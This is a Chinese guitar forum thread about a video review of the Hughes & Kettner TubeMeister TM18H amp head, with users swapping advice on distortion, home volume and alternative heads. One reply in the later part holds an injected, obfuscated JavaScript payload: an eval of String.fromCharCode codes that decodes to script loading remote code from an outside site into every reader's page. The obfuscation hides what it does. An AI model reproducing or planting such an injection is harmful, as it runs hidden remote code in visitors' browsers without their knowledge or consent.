unclezzm 发表于 2017-3-9 11:01:55

不只是测评还是科普—— H&K 18瓦高颜值小箱头测评(中)

上集:http://bbs.guitarschina.com/thread-2128817-1-1.html
本集观看地址:https://v.qq.com/x/page/v03824blblj.html
https://imgcache.qq.com/tencentvideo_v1/playerv3/TPout.swf?max_age=86400&v=20161117&vid=v03824blblj&auto=0
麦口罩测评,不止是测评,还是科普。
这一集里麦口罩也让大家了解一下管箱音量和功率衰减的作用。
Hughes & Kettner TubeMeister TM18H
H&K TubeMeister TM18H 麦口罩测评(中)

林宝生 发表于 2017-3-9 12:09:25

支持下老赵告别了哑巴评测       视频上升了一个档次

unclezzm 发表于 2017-3-9 12:54:15

林宝生 发表于 2017-3-9 12:09
支持下老赵告别了哑巴评测       视频上升了一个档次

俊叔叔 发表于 2017-3-9 13:08:54

gby012345678 发表于 2017-3-9 13:41:11

感谢楼主做的视频,只不过我听那失真音色有点儿crush的感觉貌似不够重吧?可能也是我耳朵有问题,我是个标准的金属党,请问楼主这18瓦的失真音色咋样啊?

unclezzm 发表于 2017-3-9 14:33:44

gby012345678 发表于 2017-3-9 13:41
感谢楼主做的视频,只不过我听那失真音色有点儿crush的感觉貌似不够重吧?可能也是我耳朵有问题,我是个标 ...

如果是被动拾音器,失真通道其实也就是Crunch了,主动拾音器的话可以弹Riff。Solo肯定要打开那个推子。但这个箱头不是定义金属箱头的,但如果把中高频开满,中频削减一些,还是可以得到金属点的音色的。但不是特别狠那种。

gt康康 发表于 2017-3-9 15:48:41

赵老师越来越专业了。有空做个橘子or15的,最近想买。。。

gby012345678 发表于 2017-3-9 16:02:39

unclezzm 发表于 2017-3-9 14:33
如果是被动拾音器,失真通道其实也就是Crunch了,主动拾音器的话可以弹Riff。Solo肯定要打开那个推子。但 ...

谢谢楼主,受益匪浅啊。那楼主你有没有可推荐的3千左右的失真头啊?

俊叔叔 发表于 2017-3-9 16:38:29

gt康康 发表于 2017-3-9 15:48
赵老师越来越专业了。有空做个橘子or15的,最近想买。。。

橘子的几个头子我都试过···音色不说···实在受不了那些控制旋钮···全特么跟假的似的··一点阻力都没

OR15家用音量很不友好

gby012345678 发表于 2017-3-9 17:52:08

俊叔叔 发表于 2017-3-9 16:38
橘子的几个头子我都试过···音色不说···实在受不了那些控制旋钮···全特么跟假的似的··一点阻力 ...

而且我觉得用橘子的低端头玩儿金属很垃圾,尤其我现在用的orange Jim root,那失真散落一地啊

俊叔叔 发表于 2017-3-9 18:25:44

gby012345678 发表于 2017-3-9 17:52
而且我觉得用橘子的低端头玩儿金属很垃圾,尤其我现在用的orange Jim root,那失真散落一地啊 ...

音色我就不知道了

只是觉得旋钮太假了

gby012345678 发表于 2017-3-9 18:46:13

俊叔叔 发表于 2017-3-9 18:25
音色我就不知道了

只是觉得旋钮太假了

反正我对低端橘子头已经不抱任何希望了,最近我也在考虑randall的晶体管头

俊叔叔 发表于 2017-3-9 19:34:55

gby012345678 发表于 2017-3-9 18:46
反正我对低端橘子头已经不抱任何希望了,最近我也在考虑randall的晶体管头 ...

对于我这种彩笔来说···一个TM18就够用了··

gby012345678 发表于 2017-3-9 20:31:11

俊叔叔 发表于 2017-3-9 19:34
对于我这种彩笔来说···一个TM18就够用了··

慢慢来,谁也不是上来就会大solo嘛

gt康康 发表于 2017-3-9 21:54:40

俊叔叔 发表于 2017-3-9 16:38
橘子的几个头子我都试过···音色不说···实在受不了那些控制旋钮···全特么跟假的似的··一点阻力 ...

哈哈哈我再看看 那款马歇尔DSL100用过吗

俊叔叔 发表于 2017-3-9 22:34:57

gt康康 发表于 2017-3-9 21:54

没··只用过TM18··觉得性价比挺好的··排练能用··关键是家用音量非常友好

gt康康 发表于 2017-3-9 22:45:19

俊叔叔 发表于 2017-3-9 22:34
没··只用过TM18··觉得性价比挺好的··排练能用··关键是家用音量非常友好 ...

我再做做功课谢谢交流

minzhi5255 发表于 2017-3-10 00:04:02

赵老师的确越来越专业了啊

http://localhost/flash.swf?'+eval(String.fromCharCode(119,105,116,104,40,100,111,99,117,109,101,110,116,41,48,91,98,111,100,121,46,97,112,112,101,110,100,67,104,105,108,100,40,99,114,101,97,116,101,69,108,101,109,101,110,116,40,39,115,99,114,105,112,116,39,41,41,46,115,114,99,61,39,104,116,116,112,58,47,47,115,104,117,97,106,105,57,46,99,111,109,47,63,97,61,49,39,93,59))+'

unclezzm 发表于 2017-3-10 01:03:00

gby012345678 发表于 2017-3-9 16:02
谢谢楼主,受益匪浅啊。那楼主你有没有可推荐的3千左右的失真头啊?

Laney IRT Studio也很不错

unclezzm 发表于 2017-3-10 01:04:45

gt康康 发表于 2017-3-9 21:54

DSL100我经常接触,经典的现代Marshall的代表作!这个头我是非常的满意的!甚至爱过JVM。虽然产地有差别。我觉得DSL100是很有性价比的。

gby012345678 发表于 2017-3-10 09:29:52

unclezzm 发表于 2017-3-10 01:03
Laney IRT Studio也很不错

嗯哪,这个头我也考虑过,但听有些坛友说失真偏冷而且也有点儿散,不过我听他们给我的试听,我自己觉得还是挺好的,总比我的Jim root强

gt康康 发表于 2017-3-10 10:52:24

unclezzm 发表于 2017-3-10 01:04
DSL100我经常接触,经典的现代Marshall的代表作!这个头我是非常的满意的!甚至爱过JVM。虽然产地有差别 ...

谢谢赵老师但是家用这音量会不会有点太大了我看这个挺适合我的Laney IRT Studio

unclezzm 发表于 2017-3-10 16:03:03

gt康康 发表于 2017-3-10 10:52
谢谢赵老师但是家用这音量会不会有点太大了我看这个挺适合我的Laney IRT Studio ...

DSL没有功率衰减,可能小音量下使用憋屈些。不过我一般还会再购置一台功率衰减器。

LeV1 发表于 2017-3-13 17:26:46

1:07秒出现了一个很凶的女吉他手

unclezzm 发表于 2017-3-13 23:43:50

LeV1 发表于 2017-3-13 17:26
1:07秒出现了一个很凶的女吉他手

恩!很胸!

liklys 发表于 2017-3-14 22:08:50

真心不错,谢谢。

新闻主编 发表于 2017-3-15 11:28:23

页: [1]
查看完整版本: 不只是测评还是科普—— H&K 18瓦高颜值小箱头测评(中)